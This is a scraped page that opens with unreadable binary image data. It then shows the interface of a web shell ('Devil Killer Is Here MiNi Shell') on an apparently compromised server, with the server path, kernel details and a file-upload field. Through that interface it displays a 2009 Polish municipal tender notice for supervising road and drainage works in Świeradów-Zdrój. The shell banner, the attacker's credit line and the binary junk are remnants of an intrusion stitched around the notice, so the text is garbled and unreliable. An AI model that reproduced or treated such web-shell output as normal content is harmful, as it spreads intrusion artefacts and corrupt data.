JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090820/287508-N-2009.html

<p class="kh_header"><b>Świeradów-Zdrój: Pełnienie nadzoru inwestorskiego przy zadaniu       
inwestycyjnym pn.Poprawa  infrastruktury     drogowej  mającej na celu ułatwienie  dostępności  do infrastruktury turystycznej w  Świeradowie-Zdroju</b><br>
<b>Numer ogłoszenia: 287508 - 2009; data zamieszczenia: 20.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Świeradów-Zdrój , ul. 11-go Listopada 35, 59-850 Świeradów-Zdrój, woj. dolnośląskie, tel. 075 7816471, faks 075 7816585.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swieradowzdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego przy zadaniu       
inwestycyjnym pn.Poprawa  infrastruktury     drogowej  mającej na celu ułatwienie  dostępności  do infrastruktury turystycznej w  Świeradowie-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja usługi  pn.: Pełnienie nadzoru inwestorskiego przy  zadaniu inwestycyjnym pn. Poprawa infrastruktury drogowej mającej na celu ułatwienie dostępności do infrastruktury turystycznej w Świeradowie-Zdroju, w zakresie: branży drogowej, branży  sanitarnej i branży elektrycznej. Zadanie   inwestycyjne realizowane będzie  w ramach  umów, dotyczących następujących zadań:
CZĘŚĆ I  Pełnienie nadzoru inwestorskiego przy  budowie nowej drogi gminnej od ul. Kardynała Stefana Wyszyńskiego z  łącznikiem do ul. Piastowskiej

Nadzór inwestorski na w/w części sprawowany będzie nad wykonywaniem robót budowlanych obejmujących:
Budowa nowej drogi gminnej od ul. Kardynała Stefana Wyszyńskiego z łącznikiem do ul. Piastowskiej - ok. 532,05 mb, wraz z infrastrukturą (oświetlenie uliczne - kabel oświetleniowy o długości ok. 697,00mb, słupy oświetleniowe - 25 kompletów, kanalizacja deszczowa - kanał główny o średnicy 200-300mm o długości ok. 482,10mb, przykanaliki o średnicy 150mm o długości ok. 65,90m)


CZĘŚĆ II:
Zadanie 1 Pełnienie nadzoru inwestorskiego przy  przebudowie  ul. Adama Mickiewicza
Zadanie 2 Pełnienie nadzoru inwestorskiego przy  przebudowie  ul. Górskiej

Nadzór inwestorski na w/w części sprawowany będzie nad wykonywaniem robót budowlanych obejmujących:

1. Przebudowa  ul. Adama Mickiewicza - ok. 340,20 m, wraz z infrastrukturą (kanalizacja deszczowa - kanał główny o średnicy 200mm o długości ok. 97,50mb, przykanaliki o średnicy 150mm o długości ok. 47,00m)
2.Przebudowa  ul. Górskiej - ok. 415,70 mb, wraz z infrastrukturą (kanalizacja deszczowa - przykanaliki o średnicy 150mm o długości ok. 44,45mb) 

CZĘŚĆ III:
Zadanie 1. Pełnienie nadzoru inwestorskiego przy  przebudowie  ul. Krótkiej
Zadanie 2. Pełnienie nadzoru inwestorskiego przy  przebudowie ul. Górskiej

Nadzór inwestorski na w/w części sprawowany będzie nad wykonywaniem robót budowlanych obejmujących:
1. Przebudowa  ul. Krótkiej - ok. 131,45 mb, wraz z infrastrukturą (oświetlenie uliczne - kabel oświetleniowy o długości ok. 153,00mb, słupy oświetleniowe - 6 kompletów, kanalizacja deszczowa - kanał główny o średnicy 600mm o długości ok. 121,00mb, przykanaliki o średnicy 150mm o długości ok. 34,70mb) 
2. Przebudowa  ul. Górskiej - ok. 196,00 mb, wraz z infrastrukturą (kanalizacja deszczowa - przykanaliki o średnicy 150mm o długości ok. 22,55mb) 


CZĘŚĆ IV:
Zadanie 1 Pełnienie nadzoru inwestorskiego przy  przebudowie ul. Wczasowej
Zadanie 2 Pełnienie nadzoru inwestorskiego przy  przebudowie  ul. Sienkiewicza

Nadzór inwestorski na w/w części sprawowany będzie nad wykonywaniem robót budowlanych obejmujących:
1. Przebudowa  ul. Wczasowej - ok. 306,30 mb, wraz z infrastrukturą (kanalizacja deszczowa - kanał główny o średnicy 200mm o długości ok. 140,00mb, przykanaliki o średnicy 150mm o długości ok. 28,80mb) 
2. Przebudowa  ul. Sienkiewicza - ok. 340,20 mb, wraz z infrastrukturą (oświetlenie uliczne - kabel oświetleniowy o długości ok. 120,00mb, słupy oświetleniowe - 3 komplety, kanalizacja deszczowa - kanał główny o średnicy 315-600mm o długości ok. 372,00mb, przykanaliki o średnicy 150mm o długości ok. 180,00mb) 



CZĘŚĆ V:
 Zadanie 1 Pełnienie nadzoru inwestorskiego przy  przebudowie   ul. 3-go Maja
Zadanie 2 Pełnienie nadzoru inwestorskiego przy  przebudowie   ul. Zdrojowej 

Nadzór inwestorski na w/w części sprawowany będzie nad wykonywaniem robót budowlanych obejmujących:
1. Przebudowa  ul. 3-go Maja - ok. 177,15 mb, wraz z infrastrukturą (oświetlenie uliczne - kabel oświetleniowy o długości ok. 212,00mb, słupy oświetleniowe - 8 kompletów, kanalizacja deszczowa - kanał główny o średnicy 200-300mm o długości ok. 147,10mb, przykanaliki o średnicy 150mm o długości ok. 29,80mb) 
2. Przebudowa  ul. Zdrojowej - ok. 170,00 mb, wraz z infrastrukturą (oświetlenie uliczne - kabel oświetleniowy o długości ok. 287,00mb, słupy oświetleniowe - 7 kompletów, kanalizacja deszczowa - kanał główny o średnicy 200mm o długości ok. 150,10mb, przykanaliki o średnicy 150mm o długości ok. 37,60mb) 


Zakres usługi  obejmuje pełny zakres czynności jaki dla inspektora nadzoru przewiduje ustawa z dnia 07.07.1994r. Prawo budowlane Dz. U. z 2006 Nr 156, poz. 1118 z późn. zm.). i będzie realizowany w branżach drogowej,  sanitarnej i elektrycznej. W przypadku niejasności w zakresie praw i obowiązków Zleceniobiorcy ustala się, iż celem niniejszej usługi jest stworzenie całościowego efektywnego systemu nadzoru inwestorskiego nad zadaniem inwestycyjnym pn.: Poprawa  infrastruktury     drogowej  mającej na celu ułatwienie  dostępności  do infrastruktury turystycznej w  Świeradowie-Zdroju. Zleceniobiorca podczas realizacji umowy zobowiązany jest do takiego działania na rzecz i w imieniu Zamawiającego, aby najkorzystniej zrealizować inwestycje tj. przy utrzymaniu standardów jakości działać na rzecz terminowego zakończenia realizacji inwestycji, w szczególności: 
a) reprezentowanie Zamawiającego na placu budowy poprzez sprawowanie kontroli zgodności realizacji zadania inwestycyjnego, z obowiązującymi przepisami i polskimi normami, zasadami wiedzy technicznej, z Dokumentacją Projektową, Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych, pozwoleniem na budowę, decyzją środowiskową, umową o dofinansowanie zawartą między Zamawiającym a Zarządem Województwa Dolnośląskiego, umowami o wykonanie robót budowlanych, dotyczącymi  części: I, II, III, IV, V zadania inwestycyjnego zawartymi pomiędzy Zamawiającym a Wykonawcami, 
b) sprawdzanie jakości wykonanych robót, wbudowanych wyrobów, a w szczególności zapobieganie stosowaniu wyrobów wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie; wszelkie zastosowane materiały budowlane na zadaniu inwestycyjnym muszą być nowe oraz odpowiadać co do jakości wymaganiom określonym w ustawie z dnia 16 kwietnia 2004r. o wyrobach budowlanych (Dz. U. , Nr 92, poz. 881), a także wymaganiom jakościowym określonym w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych oraz Dokumentacji Projektowej.
c) koordynacja robót poszczególnych branż,
d) sprawdzanie i odbiór robót ulegających zakryciu lub zanikowi, uczestniczenie w próbach, badaniach, próbach technicznych sieci, instalacji, urządzeń technicznych i przewodów oraz przygotowanie i udział w czynnościach przekazania placu budowy, odbiorów częściowych i odbiorów  końcowych,
e) potwierdzenie faktycznie wykonanych robót, usunięcia wad oraz kontrolowanie rozliczeń budowy,
f) kontrola prawidłowości prowadzenia Dziennika Budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego oraz wyceny robót,
g) rozstrzyganie wątpliwości natury technicznej powstałych w toku prowadzonych robót a w razie potrzeby zaciągania opinii autora projektu,
h) stwierdzanie gotowości do odbiorów robót zanikowych, odbiorów częściowych i końcowych wpisem do Dziennika Budowy oraz pisemne poinformowanie o tym fakcie Zamawiającego.
i) potwierdzanie faktycznie wykonanego zakresu robót jako podstawy do fakturowania częściowego zgodnie z postanowieniami umowy zawartej pomiędzy Zamawiającym a Wykonawcami,
j) sprawdzanie pod względem zasadności wykonania, obmiaru oraz kontroli merytorycznej i rachunkowej wycen robót dodatkowych/uzupełniających, przedstawianie do zatwierdzania protokołów konieczności robót dodatkowych/uzupełniających - wprowadzanie ich do realizacji po uzyskaniu akceptacji projektanta (rysunki zamienne lub wpis do Dziennika Budowy) i Zamawiającego (umowa na roboty dodatkowe/uzupełniające);kompletowanie protokołów nadzoru autorskiego, kompletowanie  dokumentacji z naniesionymi  poprawkami  projektanta na dokumentacje projektowe, kompletowanie protokołów odbioru robót zanikowych, prób technicznych, itp. wynikających z prawa budowlanego i norm branżowych,
k) składanie comiesięcznych raportów o stanie zaawansowania inwestycji  oraz występujących trudnościach w realizacji zadania inwestycyjnego i odstępstwach od umów zawartych przez Zamawiającego z Wykonawcami w terminie do 5 - go dnia miesiąca za miesiąc poprzedni,
l) przygotowanie w imieniu Zamawiającego kompletu dokumentów oraz złożenie zawiadomienia o zakończeniu budowy do Powiatowego Inspektora Nadzoru Budowlanego w Lubaniu i przekazanie kopii wniosku Zamawiającemu z potwierdzona datą wpływu PINB i oświadczeniem o przyjęciu go bez zastrzeżeń,
ł) przygotowanie oraz przedłożenie Zamawiającemu w terminie 15 dni od daty podpisania protokołu końcowego budowy sprawozdania końcowego z realizacji inwestycji zgodnie z załącznikiem nr 1,
m) uczestniczenie w przeglądach wynikłych z gwarancji i rękojmi w terminach 12, 24, 36 miesięcy od dnia rozpoczęcia okresów gwarancji i rękojmi,
n) obowiązkowy udział w cotygodniowych radach budowy,
o) jeżeli w okresie realizacji robót zajdzie uzasadniona konieczność wykonania robót uzupełniających/dodatkowych niezbędnych do prawidłowego wykonania przedmiotu umowy Zleceniobiorca powinien niezwłocznie zawiadomić o tym fakcie Zamawiającego. Pisemna zgoda Zamawiającego będzie podstawa wszczęcia postępowania, o którym mowa w art. 67 ust. 5 lub 6 ustawy Prawo zamówień publicznych i zawarcia stosownej umowy z Wykonawcą i wykonania robót uzupełniających/dodatkowych.
4. Obowiązki o których mowa w § 3 wykonywane będą poprzez pobyt koordynatora/inspektora nadzoru odpowiednio do potrzeb wynikających z toku budowy jednak nie rzadziej niż dwa razy w tygodniu w godzinach pracy Urzędu. Pobyt musi być udokumentowany wpisem do Dziennika Budowy.
5.W przypadku wystąpienia robót uzupełniających/dodatkowych obowiązkiem Zleceniobiorcy będzie pełnienie nadzoru zgodnie z obowiązkami przewidzianymi w niniejszej umowie bez odrębnego wynagrodzenia.
6. Ponadto Zleceniobiorca  zobowiązany będzie do będzie  do uczestnictwa  w przeglądach wynikłych z gwarancji i rękojmi w terminach 12, 24, 36 miesięcy od dnia rozpoczęcia okresów gwarancji i rękojmi oraz  wynikających  z  konieczności złożenia  wyjasnień w związku ze złożenim przez Zamawiającego wniosków o  płatność oraz udzielenie  wyjaśnień, w tym w ramach prowadzonych kontroli i audytów , w okresie trwałości  projektu pn.: Poprawa  infrastruktury     drogowej  mającej na celu ułatwienie  dostępności  do infrastruktury turystycznej w  Świeradowie-Zdroju.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-0, 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania Wykonawca zobowiązany jest wnieść wadium w wysokości : 3 400,00 zł  (słownie: trzy tysiące czterysta złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy PZP.
2.W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy PZP.
3.W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy PZP.
4.W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy PZP.
5.W celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tj.  

a) dysponuje osobą/ami posiadającą/ymi łącznie następujące kwalifikacje i uprawnienia:





aa1) uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń, 


aa2) członkostwo i wymagane ubezpieczenie od odpowiedzialności cywilnej z Okręgowej Izby Inżynierów Budownictwa.













aa3)  posiada
3 letnie doświadczenie w kierowaniu robotami drogowymi.


ab1)  uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych bez ograniczeń,




ab2)  członkostwo i wymagane ubezpieczenie od odpowiedzialności cywilnej z Okręgowej Izby Inżynierów Budownictwa,


b) posiada niezbędną wiedzę i doświadczenie tj. 

ba) wykonał  jedną   
usługę  z zakresu  sprawowania nadzoru  inwestorskiego  przy zadaniu inwestycyjnym o wartości  robót min.1 000 000 zł, polegającym na budowie lub przebudowie drogi o nawierzchni bitumicznej 
lub
wykonał  jedną   
usługę  o wartości min. 20 000 zł  z zakresu  sprawowania nadzoru  inwestorskiego  przy zadaniu inwestycyjnym, polegającym na budowie lub przebudowie drogi o nawierzchni bitumicznej.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych 
2.Oświadczenie o spełnianiu warunków określonych w art. 24 ustawy Prawo Zamówień Publicznych
3.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
4.Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert











5a) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nie czynności lub pisemne zobowiązania innych podmiotów do udostępniania osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa powyżej, wykonawca wskazał osobę/y, którymi będzie dysponował.

aa1) decyzja o stwierdzeniu przygotowania zawodowego w zakresie kierowania robotami w specjalności drogowej bez ograniczeń, 

aa2) Zaświadczenie o członkostwie i wymaganym ubezpieczeniem od odpowiedzialności cywilnej z Okręgowej Izby Inżynierów Budownictwa.

aa3) wymagany warunek spełni  wpisanie do wykazu osób o którym mowa w  pkt.5a osoby posiadającej min. 3 letnie doświadczenie w kierowaniu robotami drogowymi


ab1) Decyzja o stwierdzeniu przygotowania zawodowego w zakresie do kierowania robotami w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych bez ograniczeń,

ab2) zaświadczenie o członkostwie i wymaganym ubezpieczeniu od odpowiedzialności cywilnej z Okręgowej Izby Inżynierów Budownictwa,




ba) Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartościom usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, oraz daty i miejsca wykonania wraz załączeniem dokumentów w formie referencji potwierdzających, że usługi te zostały wykonane należycie. Z przedłożonych referencji winno jasno wynikać: w jakim okresie prowadzone były prace , jaki obejmowały zakres w szczególności ich  wartość  oraz potwierdzenie, że  prace zostały wykonane należycie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um-swieradow.bip.pbox.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Świeradów-Zdrój
ul. 11-go Listopada 35
59-850 Świeradów-Zdrój
pokój 21a.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.09.2009 godzina 12:00, miejsce: Urząd Miasta Świeradów-Zdrój
ul. 11-go Listopada 35
59-850 Świeradów-Zdrój
pokój 24a.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  współfinansowany przez Unię Europejską środków Europejskiego Funduszu Rozwoju Regionalnego  w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013

Creat By MiNi SheLL
Email: jattceo@gmail.com